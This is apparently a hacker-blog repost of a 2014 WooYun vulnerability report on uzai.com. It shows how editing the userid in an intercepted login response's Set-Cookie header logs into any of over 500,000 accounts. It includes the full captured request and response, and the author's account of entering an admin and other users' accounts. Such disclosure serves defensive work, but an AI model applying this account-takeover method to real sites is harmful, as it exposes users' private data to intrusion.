记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

看我如何随意登录悠哉旅游网50多万用户帐号

2014-07-15 03:20

response欺骗实例应用:

随意登录悠哉旅游网50多万用户任意帐号

首先说明一下,注册手机账户通常都是要手机号短信验证,而悠哉旅游网却略过了这一步,只要输入手机帐号无需验证直接注册成功(设计缺陷)

于是我直接注册了该帐号 (18688888888:wooyun)

q5.jpg



在提交登录的时候抓包截包,获取到如下post请求:

POST /reguser HTTP/1.1

Host: u.uzai.com

Proxy-Connection: keep-alive

Content-Length: 132

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://u.uzai.com

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://u.uzai.com/reguser

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: uzaiURLRefer=http%3A%2F%2Fwww.uzai.com%2F; uzaiNewURLRefer=http%3A%2F%2Fwww.uzai.com%2F; SERVERID=app32; uzwDangDiYou=1; history_cookie=76313_uh_%u3010%u516D%u6708%u3011%u97E9%u56FD%u9996%u5C14+%u6D4E%u5DDE%u6B22%u4E505%u65E5%u6E38%uFF08%u4E1C%u822A%uFF09_uh_3%u98DE%u4E0D%u8D70%u56DE%u5934%u8DEF%uFF0C%u97E9%u56FD%u7ECF%u5178%u666F%u70B9%uFF0C%u4E1C%u5927%u95E8+%u660E%u6D1E%u81EA%u7531%u8D2D%u5A31%u3002_uh_http://sh.uzai.com/tour-76313.html_uh_http://r.uzaicdn.com/pic/11043/m/w160/h120/t1_uh_3174_uh_2014/5/30 下午9:58:30; ASP.NET_SessionId=griefnhaholjs3qwi3zcuck3; __pztm_ref.4bd3852a51f48d59272566a168b43ea1=%5B1401459603689%2C%22http%3A%2F%2Fwww.uzai.com%2F%22%5D; __pztm_lp=null|http://www.uzai.com/; _ga=GA1.2.1414981402.1401458306; __pztm_cv=DGPCCBIC3GNG9EFG.1401458305956.1.1401461828933.1401458305956.1401458305956; __pztm_ses.4bd3852a51f48d59272566a168b43ea1=*; Hm_lvt_c6ca6ea4f6a82938e24232a7a3da3949=1401458306; Hm_lpvt_c6ca6ea4f6a82938e24232a7a3da3949=1401461829; Hm_lvt_a3dc6e4ea7fc10d1543395ebe6516d12=1401458306; Hm_lpvt_a3dc6e4ea7fc10d1543395ebe6516d12=1401461829



hidden_UpPageURL=http%3A%2F%2Fwww.uzai.com%2F&username=18688888888&password=wooyun&txtPassCode=&txtCardNum=&cooktime=1&keyUserCount=



利用burpsuite中的Do intercept-Response to this request功能

q2.jpg



Forward当前数据包,收到response响应:

HTTP/1.1 302 Found

Cache-Control: public

Content-Type: text/html; charset=utf-8

Location: http://www.uzai.com/

Server: Microsoft-IIS/7.5

X-AspNetMvc-Version: 2.0

X-AspNet-Version: 4.0.30319

Set-Cookie: user=userName=uzai503483&Email=&Mobile=18688888888&realname=&userid=503483&nickname=&headUrl=&islogin=1&userGrade=A; domain=uzai.com; expires=Fri, 06-Jun-2014 15:02:49 GMT; path=/

X-Powered-By: ASP.NET

Date: Fri, 30 May 2014 15:02:48 GMT

Connection: close

Content-Length: 137



<html><head><title>Object moved</title></head><body>

<h2>Object moved to <a href="http://www.uzai.com/">here</a>.</h2>

</body></html>



修改Set-Cookie中的userid 再Forward出去就可以秒进他人账户,userid=503483 50多万..

漏洞证明:

进个userid=1的用户 用户名:uzaiadmin

qz.jpg



q8.jpg



这个应该是测试帐号,其他各种敏感信息

我还测试了好几个帐号,不一一示例,仅证明影响

修复方案:

程序猿懂得


知识来源: www.wooyun.org/bugs/wooyun-2014-062931

阅读:132169 | 评论:1 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“看我如何随意登录悠哉旅游网50多万用户帐号”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云